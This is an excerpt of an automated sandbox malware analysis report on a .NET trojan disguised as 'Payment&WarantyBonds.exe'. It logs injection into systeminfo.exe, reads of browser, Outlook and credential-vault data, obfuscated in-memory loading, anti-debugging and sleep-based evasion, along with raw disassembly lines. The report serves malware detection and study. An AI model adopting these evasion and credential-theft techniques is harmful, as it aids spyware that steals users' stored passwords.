                Source: 0.2.Payment&WarantyBonds.exe.40fd798.2.raw.unpack, pN57RL3xyXkW5ANnHQ.cs Security API names: _0020.SetAccessControl
                Source: 0.2.Payment&WarantyBonds.exe.40fd798.2.raw.unpack, pN57RL3xyXkW5ANnHQ.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Payment&WarantyBonds.exe.40fd798.2.raw.unpack, pN57RL3xyXkW5ANnHQ.cs Security API names: _0020.AddAccessRule
                Source: 0.2.Payment&WarantyBonds.exe.41851b8.0.raw.unpack, cILh9bHvx4dPN3VnUI.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Payment&WarantyBonds.exe.aff0000.4.raw.unpack, cILh9bHvx4dPN3VnUI.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Payment&WarantyBonds.exe.41851b8.0.raw.unpack, pN57RL3xyXkW5ANnHQ.cs Security API names: _0020.SetAccessControl
                Source: 0.2.Payment&WarantyBonds.exe.41851b8.0.raw.unpack, pN57RL3xyXkW5ANnHQ.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Payment&WarantyBonds.exe.41851b8.0.raw.unpack, pN57RL3xyXkW5ANnHQ.cs Security API names: _0020.AddAccessRule
                Source: 0.2.Payment&WarantyBonds.exe.40fd798.2.raw.unpack, cILh9bHvx4dPN3VnUI.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/2@15/14
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Payment&WarantyBonds.exe.log
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Mutant created: NULL
                Source: C:\Windows\SysWOW64\systeminfo.exe File created: C:\Users\user\AppData\Local\Temp\4648H9mUM
                Source: Payment&WarantyBonds.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                Source: C:\Program Files\Mozilla Firefox\firefox.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: systeminfo.exe, 00000007.00000002.4105934203.0000000000A67000.00000004.00000020.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000003.2210625422.0000000000A67000.00000004.00000020.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000003.2210506095.0000000000A45000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: Payment&WarantyBonds.exe ReversingLabs: Detection: 45%
                Source: Payment&WarantyBonds.exe Virustotal: Detection: 40%
                Source: unknown Process created: C:\Users\user\Desktop\Payment&WarantyBonds.exe "C:\Users\user\Desktop\Payment&WarantyBonds.exe"
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Process created: C:\Users\user\Desktop\Payment&WarantyBonds.exe "C:\Users\user\Desktop\Payment&WarantyBonds.exe"
                Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe Process created: C:\Windows\SysWOW64\systeminfo.exe "C:\Windows\SysWOW64\systeminfo.exe"
                Source: C:\Windows\SysWOW64\systeminfo.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Section loaded: mscoree.dll
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Section loaded: version.dll
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Section loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Section loaded: dwrite.dll
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Section loaded: textshaping.dll
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Section loaded: amsi.dll
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Section loaded: msasn1.dll
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Section loaded: gpapi.dll
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Section loaded: windowscodecs.dll
                Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: mpr.dll
                Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: framedynos.dll
                Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: version.dll
                Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: mlang.dll
                Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: winsqlite3.dll
                Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: cryptbase.dll
                Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe Section loaded: wininet.dll
                Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe Section loaded: mswsock.dll
                Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe Section loaded: dnsapi.dll
                Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe Section loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exeProcess created: C:\Windows\SysWOW64\systeminfo.exe "C:\Windows\SysWOW64\systeminfo.exe"
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: Payment&WarantyBonds.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: Payment&WarantyBonds.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: sysinfo.pdb source: Payment&WarantyBonds.exe, 00000002.00000002.2021166818.0000000001378000.00000004.00000020.00020000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000006.00000002.4106349001.0000000001298000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: sysinfo.pdbGCTL source: Payment&WarantyBonds.exe, 00000002.00000002.2021166818.0000000001378000.00000004.00000020.00020000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000006.00000002.4106349001.0000000001298000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: lVlYtqLlYCJP.exe, 00000006.00000000.1945290809.0000000000E3E000.00000002.00000001.01000000.0000000C.sdmp, lVlYtqLlYCJP.exe, 00000008.00000000.2099378604.0000000000E3E000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: Payment&WarantyBonds.exe, 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4106815132.000000000484E000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4106815132.00000000046B0000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000003.2024409473.0000000004358000.00000004.00000020.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000003.2026389325.0000000004500000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Payment&WarantyBonds.exe, Payment&WarantyBonds.exe, 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, systeminfo.exe, 00000007.00000002.4106815132.000000000484E000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4106815132.00000000046B0000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000003.2024409473.0000000004358000.00000004.00000020.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000003.2026389325.0000000004500000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                Source: 0.2.Payment&WarantyBonds.exe.3650b90.1.raw.unpack, Uo.cs, .Net Code: _202A_202E_206E_206A_202B_206A_200E_200D_206F_200D_200C_200B_206E_202C_202B_200E_206A_202D_202A_202C_202E_206B_202C_202E_202D_206F_206C_200E_202D_206B_202D_206D_202A_200C_200C_200B_200C_202B_200D_202E_202E System.Reflection.Assembly.Load(byte[])
                Source: 0.2.Payment&WarantyBonds.exe.41851b8.0.raw.unpack, pN57RL3xyXkW5ANnHQ.cs, .Net Code: lF1lHEnjq2 System.Reflection.Assembly.Load(byte[])
                Source: 0.2.Payment&WarantyBonds.exe.aff0000.4.raw.unpack, pN57RL3xyXkW5ANnHQ.cs, .Net Code: lF1lHEnjq2 System.Reflection.Assembly.Load(byte[])
                Source: 0.2.Payment&WarantyBonds.exe.40fd798.2.raw.unpack, pN57RL3xyXkW5ANnHQ.cs, .Net Code: lF1lHEnjq2 System.Reflection.Assembly.Load(byte[])
                Source: 0.2.Payment&WarantyBonds.exe.50d0000.3.raw.unpack, Uo.cs, .Net Code: _202A_202E_206E_206A_202B_206A_200E_200D_206F_200D_200C_200B_206E_202C_202B_200E_206A_202D_202A_202C_202E_206B_202C_202E_202D_206F_206C_200E_202D_206B_202D_206D_202A_200C_200C_200B_200C_202B_200D_202E_202E System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe, Code function: 0_2_007A4659 push edx; retf 0_2_007A465A
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe, Code function: 0_2_007A46C1 push ebx; retf 0_2_007A46C2
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe, Code function: 0_2_007A46BB push edx; retf 0_2_007A46BE
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe, Code function: 0_2_007A46B9 push ebx; retf 0_2_007A46BA
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe, Code function: 0_2_007A4778 push esi; retf 0_2_007A477A
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe, Code function: 0_2_007A47AF push esi; retf 0_2_007A47B2
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe, Code function: 0_2_007AAC60 pushfd ; retf 0_2_007AAC62
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe, Code function: 0_2_007AAC58 pushfd ; retf 0_2_007AAC5A
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe, Code function: 0_2_00C004E8 push esp; ret 0_2_00C004E9
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe, Code function: 2_2_0040185B pushfd ; retf 2_2_0040187E
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe, Code function: 2_2_00426833 push edi; ret 2_2_0042683E
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe, Code function: 2_2_004148C0 push esp; retf 2_2_004148C1
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe, Code function: 2_2_004018BC pushad ; ret 2_2_004018D2
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe, Code function: 2_2_004031B0 push eax; ret 2_2_004031B2
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe, Code function: 2_2_004139BA pushfd ; ret 2_2_004139BB
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe, Code function: 2_2_0041AA77 push edx; iretd 2_2_0041AA86
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe, Code function: 2_2_00418304 push eax; ret 2_2_00418305
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe, Code function: 2_2_00417BD1 push esi; ret 2_2_00417BDA
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe, Code function: 2_2_0040D3BF push edx; ret 2_2_0040D3DA
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe, Code function: 2_2_00422562 push ss; retn 0000h 2_2_0042256A
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe, Code function: 2_2_00417E58 push ss; retf 2_2_00417E8D
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe, Code function: 2_2_0041A6CB push edi; retf 2_2_0041A6DC
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe, Code function: 2_2_00401F0B pushfd ; retf 2_2_00401F0C
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe, Code function: 2_2_0041771B push esi; ret 2_2_0041771D
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe, Code function: 2_2_0041473C push edi; retf 2_2_0041473E
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe, Code function: 2_2_004117B1 push ss; iretd 2_2_004117C5
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe, Code function: 2_2_017D225F pushad ; ret 2_2_017D27F9
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe, Code function: 2_2_017D27FA pushad ; ret 2_2_017D27F9
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe, Code function: 2_2_018009AD push ecx; mov dword ptr [esp], ecx 2_2_018009B6
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe, Code function: 2_2_017D283D push eax; iretd 2_2_017D2858
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe, Code function: 2_2_017D1366 push eax; iretd 2_2_017D1369
                Source: Payment&WarantyBonds.exe, Static PE information: section name: .text entropy: 7.95788200827039
                Source: 0.2.Payment&WarantyBonds.exe.41851b8.0.raw.unpack, 0.2.Payment&WarantyBonds.exe.aff0000.4.raw.unpack, 0.2.Payment&WarantyBonds.exe.40fd798.2.raw.unpack: High entropy of concatenated method names
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe, Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: Yara match File source: Process Memory Space: Payment&WarantyBonds.exe PID: 7284, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\systeminfo.exe API/Special instruction interceptor: Address: 7FFE2220D324
                Source: C:\Windows\SysWOW64\systeminfo.exe API/Special instruction interceptor: Address: 7FFE2220D7E4
                Source: C:\Windows\SysWOW64\systeminfo.exe API/Special instruction interceptor: Address: 7FFE2220D944
                Source: C:\Windows\SysWOW64\systeminfo.exe API/Special instruction interceptor: Address: 7FFE2220D504
                Source: C:\Windows\SysWOW64\systeminfo.exe API/Special instruction interceptor: Address: 7FFE2220D544
                Source: C:\Windows\SysWOW64\systeminfo.exe API/Special instruction interceptor: Address: 7FFE2220D1E4
                Source: C:\Windows\SysWOW64\systeminfo.exe API/Special instruction interceptor: Address: 7FFE22210154
                Source: C:\Windows\SysWOW64\systeminfo.exe API/Special instruction interceptor: Address: 7FFE2220DA44
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Memory allocated: 7A0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Memory allocated: 2630000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Memory allocated: BF0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Memory allocated: 8440000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Memory allocated: 9440000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Memory allocated: 9630000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Memory allocated: A630000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Memory allocated: B080000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Memory allocated: C080000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0184096E rdtsc 2_2_0184096E
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\systeminfo.exe Window / User API: threadDelayed 9660
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe API coverage: 0.7 %
                Source: C:\Windows\SysWOW64\systeminfo.exe API coverage: 2.6 %
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe TID: 7304 Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\systeminfo.exe TID: 7920 Thread sleep count: 313 > 30
                Source: C:\Windows\SysWOW64\systeminfo.exe TID: 7920 Thread sleep time: -626000s >= -30000s
                Source: C:\Windows\SysWOW64\systeminfo.exe TID: 7920 Thread sleep count: 9660 > 30
                Source: C:\Windows\SysWOW64\systeminfo.exe TID: 7920 Thread sleep time: -19320000s >= -30000s
                Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe TID: 7940 Thread sleep time: -75000s >= -30000s
                Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe TID: 7940 Thread sleep count: 38 > 30
                Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe TID: 7940 Thread sleep time: -57000s >= -30000s
                Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe TID: 7940 Thread sleep count: 38 > 30
                Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe TID: 7940 Thread sleep time: -38000s >= -30000s
                Source: C:\Windows\SysWOW64\systeminfo.exe Last function: Thread delayed
                Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_005CC500 FindFirstFileW,FindNextFileW,FindClose,7_2_005CC500
                Source: lVlYtqLlYCJP.exe, 00000008.00000002.4106292158.0000000000860000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllU
                Source: systeminfo.exe, 00000007.00000002.4105934203.00000000009F9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: firefox.exe, 00000009.00000002.2334739815.00000125FE76C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll??
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Process information queried: ProcessInformation
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\systeminfo.exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_00417643 LdrLoadDll,2_2_00417643
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0180A2C3 mov eax, dword ptr fs:[00000030h]2_2_0180A2C3
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0180A2C3 mov eax, dword ptr fs:[00000030h]2_2_0180A2C3
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_017F823B mov eax, dword ptr fs:[00000030h]2_2_017F823B
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018D62D6 mov eax, dword ptr fs:[00000030h]2_2_018D62D6
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018102E1 mov eax, dword ptr fs:[00000030h]2_2_018102E1
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018102E1 mov eax, dword ptr fs:[00000030h]2_2_018102E1
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018102E1 mov eax, dword ptr fs:[00000030h]2_2_018102E1
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01888243 mov eax, dword ptr fs:[00000030h]2_2_01888243
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01888243 mov ecx, dword ptr fs:[00000030h]2_2_01888243
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018D625D mov eax, dword ptr fs:[00000030h]2_2_018D625D
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01806259 mov eax, dword ptr fs:[00000030h]2_2_01806259
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018BA250 mov eax, dword ptr fs:[00000030h]2_2_018BA250
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018BA250 mov eax, dword ptr fs:[00000030h]2_2_018BA250
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01804260 mov eax, dword ptr fs:[00000030h]2_2_01804260
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01804260 mov eax, dword ptr fs:[00000030h]2_2_01804260
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01804260 mov eax, dword ptr fs:[00000030h]2_2_01804260
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018B0274 mov eax, dword ptr fs:[00000030h]2_2_018B0274
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018B0274 mov eax, dword ptr fs:[00000030h]2_2_018B0274
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018B0274 mov eax, dword ptr fs:[00000030h]2_2_018B0274
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018B0274 mov eax, dword ptr fs:[00000030h]2_2_018B0274
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018B0274 mov eax, dword ptr fs:[00000030h]2_2_018B0274
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018B0274 mov eax, dword ptr fs:[00000030h]2_2_018B0274
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018B0274 mov eax, dword ptr fs:[00000030h]2_2_018B0274
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018B0274 mov eax, dword ptr fs:[00000030h]2_2_018B0274
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018B0274 mov eax, dword ptr fs:[00000030h]2_2_018B0274
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018B0274 mov eax, dword ptr fs:[00000030h]2_2_018B0274
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018B0274 mov eax, dword ptr fs:[00000030h]2_2_018B0274
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018B0274 mov eax, dword ptr fs:[00000030h]2_2_018B0274
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01802582 mov eax, dword ptr fs:[00000030h]2_2_01802582
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01802582 mov ecx, dword ptr fs:[00000030h]2_2_01802582
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01834588 mov eax, dword ptr fs:[00000030h]2_2_01834588
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0183E59C mov eax, dword ptr fs:[00000030h]2_2_0183E59C
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018805A7 mov eax, dword ptr fs:[00000030h]2_2_018805A7
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018805A7 mov eax, dword ptr fs:[00000030h]2_2_018805A7
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018805A7 mov eax, dword ptr fs:[00000030h]2_2_018805A7
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018245B1 mov eax, dword ptr fs:[00000030h]2_2_018245B1
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018245B1 mov eax, dword ptr fs:[00000030h]2_2_018245B1
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0183E5CF mov eax, dword ptr fs:[00000030h]2_2_0183E5CF
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0183E5CF mov eax, dword ptr fs:[00000030h]2_2_0183E5CF
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018065D0 mov eax, dword ptr fs:[00000030h]2_2_018065D0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0183A5D0 mov eax, dword ptr fs:[00000030h]2_2_0183A5D0
